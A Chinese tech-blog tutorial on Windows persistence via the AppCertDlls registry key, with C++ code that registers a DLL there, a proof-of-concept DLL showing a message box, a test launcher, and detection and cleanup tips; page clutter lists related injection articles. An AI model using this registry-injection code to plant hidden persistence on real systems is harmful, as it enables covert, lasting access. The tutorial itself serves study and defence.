后门及持久化访问2----进程注入之AppCertDlls 注册表项

最新推荐文章于 2023-08-24 18:13:21 发布
最新推荐文章于 2023-08-24 18:13:21 发布
阅读量990 收藏
点赞数 1
分类专栏: # 权限维持
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36374896/article/details/107005578
版权

代码及原理介绍

如果有进程使用了CreateProcess、CreateProcessAsUser、CreateProcessWithLoginW、CreateProcessWithTokenW或WinExec

函数,那么此进程会获取HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\AppCertDlls注册表项,此项下的dll都会加载到此进程。

Win7版本下没有“AppCertDlls”项,需自己创建。

代码如下:


#include <iostream> 
#include <Windows.h> 
using namespace std;

int test()
{
	DWORD dwDisposition;
	HKEY hKey;
	const char path[] = "C:\\dll.dll";
	RegCreateKeyExA(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\AppCertDlls", 0, NULL, 0, KEY_WRITE, NULL, &hKey, &dwDisposition);
	RegSetValueExA(hKey, "Default", 0, REG_SZ, (BYTE*)path, (1 + ::lstrlenA(path)));
	return 0;
}

int main()
{
	test();
	//system("pause");
	return 0;
}

Dll代码:


// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"
BOOL TestMutex()
{
	HANDLE hMutex = CreateMutexA(NULL, false, "myself");
	if (GetLastError() == ERROR_ALREADY_EXISTS)
	{
		CloseHandle(hMutex);
		return 0;
	}
	return 1;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:  //进程创建执行
		if (TestMutex() == 0)
			return TRUE;
		MessageBoxA(0, "hello qianxiao996", "AppCert", 0);
	case DLL_THREAD_ATTACH:  //进=线程创建执行
	case DLL_THREAD_DETACH:  //进程结束执行
 	case DLL_PROCESS_DETACH: //线程结束执行
		break;
	}
	return TRUE;
}

复现过程

首先将代码运行生成EXE和DLL,完整代码在上面,将DLL文件名改为dll.dll并放到相应路径。

然后以管理员运行exe文件,发现已经创建注册表

下面编写一个创建进程的测试程序来打开notepad.exe,代码如下


#include <iostream> 
#include <Windows.h> 
using namespace std;

int main()
{
	STARTUPINFO startupInfo = { 0 };
	PROCESS_INFORMATION processInformation = { 0 };

	BOOL bSuccess = CreateProcess(TEXT("C:\Windows\System32\notepad.exe"), NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &startupInfo, &processInformation);

	if (bSuccess)
	{
		cout << "Process started." << endl
			<< "Process ID:\t"
			<< processInformation.dwProcessId << endl;
	}
	else
	{
		cout << "Cannot start process!" << endl
			<< "Error code:\t" << GetLastError() << endl;
	}


	return system("pause");
}

当运行测试exe的时候创建了进程,便调用了dll.dll文件,弹出hello qianxiao996窗口。

检查及清除方法

  • 监测dll的加载,特别是查找不是通常的dll,或者不是正常加载的dll。
  • 监视AppCertDLL注册表值
  • 监视和分析注册表编辑的API调用,如RegCreateKeyEx和RegSetValueEx。

 

浅笑⁹⁹⁶
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
最新-屏蔽金蝶联网后门验证_金蝶_最新-屏蔽金蝶联网后门验证_
10-02
最新-屏蔽金蝶联网后门验证,安装运行,重启即刻
支付宝app支付服务端接入(证书方式)
zlx312的博客
06-27 9143
支付宝支付接入的文档真的非常多,由于密钥配置错误一直返回4000错误码,折腾了小半个下午,特此记录一下。 整体开发流程图如下: 1 首先创建应用,并签约APP支付能力 官方文档:接入前准备 这个过程需要填写、认证一些公司信息。支付宝签约费率为6%。 2 首先按照官方文档生成并配置公钥证书 参考:如何生成及配置公钥证书 首先下载支付宝开放平台开发助手获取CSR文件,选择应用信息内的“接口加签方式”-“公钥证书“-”上传CSR文件”,选择目录支付宝开放平台开发助手/CSR的.c...
HOOK与注入
weixin_43781139的博客
07-21 4176
HOOK和注入技术经常被恶意代码使用。利用HOOK和注入技术,恶意代码提高了执行隐蔽性,增加了恶意代码分析难度,在某些情况下还能实现权限提升和内存常驻。 HOOK技术 挂钩(HOOK)就是在来往信息间安装“钩子”,钩取来往信息。 在用户层,常见的Hook技术有: ①消息钩子 ②Inline Hook ③IAT Hook 消息钩子 原理: 用户对应用程序的各种操作(eg:键盘输入、点击、移动等)都会产生事件;发生事件时,操作系统会把该事件对应的消息发送给相应的应用程序,应用程序分析收到的信息后执行相应的动作。
移动应用开发中AppID、AppKey、AppSecret到底是什么?
热门推荐
java
10-24 4万+
AppID:应用的唯一标识 AppKey:公匙(相当于账号) AppSecret:私匙(相当于密码) token:令牌(过期失效)   使用方法 1. 向第三方服务器请求授权时,带上AppKey和AppSecret(需存在服务器端) 2. 第三方服务器验证AppKey和AppSecret在DB中有无记录 3. 如果有,生成一串唯一的字符串(token令牌),返回给服务器,服务器再返回给...
10种常见的进程注入技术的总结
qing666888的专栏
09-21 1万+
译者:myswsun 预估稿费:300RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 0x00 前言 进程注入是一种广泛应用于恶意软件和无文件攻击中的逃避技术,这意味着可以将自定义代码运行在另一个进程的地址空间内。进程注入提高了隐蔽性,也实现了持久化。尽管有非常多的进程注入技术,但是本文我只列举了10种常见的技术。我还提供了这些
十种流行进程注入技术详细分析
weixin_34050389的博客
09-13 991
本文讲的是十种流行进程注入技术详细分析, 前言 流程注入是一种恶意软件和无文件间谍攻击中使用的最为广泛的漏洞攻击技术,而且在攻击时还需要在另一个进程的地址空间内运行自定义代码。过程注入除了提高了攻击的隐蔽性之外,也实现了持久性攻击。尽管目前有许多流程注入技术,但在本文中,我只介绍十种在野外看到的能够运用另一个进程运行恶意代码的技术。在介绍的同时,我还会...
ATT&CK v10版本战术实战研究—持久化(一)
VN520的博客
08-24 249
SiAgent是一个用于 Windows、OS X(macOS)、Linux 和 FreeBSD的操作系统检测软件。这样使得操作系统分析和监控变得既高效又直观。
渗透测试 QA 收集
whatday的专栏
07-24 2489
1、拿到一个待检测的站,你觉得应该先做什么? 信息收集 a、获取域名的whois信息,获取注册者邮箱姓名电话等,丢社工库里看看有没有泄露密码,然后尝试用泄露的密码进行登录后台。用邮箱做关键词进行丢进搜索引擎。利用搜索到的关联信息找出其他邮箱进而得到常用社交账号。社工找出社交账号,里面或许会找出管理员设置密码的习惯 。利用已有信息生成专用字典。 b、查询服务器旁站以及子域名站点,因为主站一般比较难,所以先看看旁站有没有通用性的cms或者其他漏洞。 c、查看服务器操作系统版本,web中间件,看看是否...
dll注入&代码注入
weixin_45880501的博客
09-17 1599
dll注入&代码注入 CreateRemoteThread 思路:在目标进程中申请一块内存并向其中写DLL路径,然后调用 CreateRemoteThread ,**(在自己进程中 创建远程线程到到目标进程)在目标进程中创建一个线程。**LoadLibrary()”函数作为线程的启动函数,来加载待注入DLL文件 ,LoadLibrary()参数 就是存放DLL路径的内存指针. 这时需要目标进程的4个权限(PROCESS_CREATE_THREAD,PROCESS_QUERY_INFORMATION
windows十种注入方式
活下去,学下去
09-13 5321
进程注入是一种广泛应用于恶意软件和无文件攻击中的逃避技术,这需要在另一个进程的地址空间内运行自定义代码。进程注入提高了隐蔽性,一些技术也实现了持久性。 尽管有许多流程注入技术,在本博客中,我提供了十种在现实看到注入另一个进程运行恶意代码的技术。 我还提供了许多这些技术的屏幕截图,以便于逆向工程和恶意软件分析,协助针对这些常见技术进行检测和防御。 1. 经典的DLL注入方式 经典的DLL注入方式:通过CREATEREMOTETHREAD和LOADLIBRARY进行注入。 这种技术是用于将恶意软件注入另一
行业资料-交通装置-一种客车后门铰链.zip
08-26
行业资料-交通装置-一种客车后门铰链.zip
行业资料-交通装置-一种汽车后门安装装置.zip
08-26
行业资料-交通装置-一种汽车后门安装装置.zip
行业资料-交通装置-一种汽车后门铰链装置.zip
08-24
行业资料-交通装置-一种汽车后门铰链装置.zip
行业资料-交通装置-一种汽车后门内蒙皮.zip
08-17
行业资料-交通装置-一种汽车后门内蒙皮.zip
电子、通信、计算机大类学生课程实验的心得体会
05-01
电子、通信、计算机大类学生课程实验的心得体会 电子、通信、计算机大类的学生课程实验是工科教育中非常重要的一环,它不仅能够加深学生对理论知识的理解,还能培养学生的实践能力和创新思维。
【营销】任务一金融产品与金融产品营销认识.docx
05-01
【营销】任务一金融产品与金融产品营销认识.docx
单片机课程实验-秒表实现
05-01
1.了解LED数码管的工作原理,为秒表时钟模块的实现打下基础。 LED数码管是一种常用的数字显示器件,通过控制每个LED的亮灭来显示数字。在秒表时钟模块中,我们需要利用LED数码管的这一特性,通过单片机控制数码管的显示,从而实现时钟的功能。因此,了解LED数码管的工作原理对于实现秒表时钟模块至关重要。 2.掌握51单片机与LED数码管的接口技术,是实现秒表时钟模块的关键。 51单片机是一种常用的微控制器,可以通过接口与外部设备进行通信。在秒表时钟模块中,我们需要通过单片机与LED数码管之间的接口,控制数码管的显示。因此,掌握51单片机与LED数码管的接口技术是实现秒表时钟模块的关键。在实际操作中,我们需要根据接口协议和数据传输方式,编写相应的程序来控制数码管的显示。 3.合理利用定时器/计数器,是实现秒表时钟模块的效率保障。 在秒表时钟模块中,我们需要实现计时功能,这需要使用到定时器/计数器。定时器/计数器可以用来产生计时脉冲,从而控制秒表的计时。通过合理利用定时器/计数器,可以提高秒表时钟模块的计时精度和效率。在实际操作中,我们需要根据具体的应用场景和需求,选择合适的定时器/计数器参
基于LSTM的SDN流量预测与负载均衡python源码+详细注释+数据.zip
最新发布
05-01
个人98分期末大作业目,代码完整下载可用。主要针对计算机相关专业的正在做课程设计和期末大作业的学生和需要目实战练习的学习者。包含全部目源码、该目可以直接使用、目都经过严格调试,下载即用确保可以运行!
exe-dat后门添加器
08-08
黑客可以利用后门添加器访问和控制计算机上的文件、截取键盘输入、监听网络通信等。此外,黑客还可以将计算机加入到一个僵尸网络中,用于发动分布式拒绝服务(DDoS)攻击、发送垃圾邮件等非法活动。 为了保护自己的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值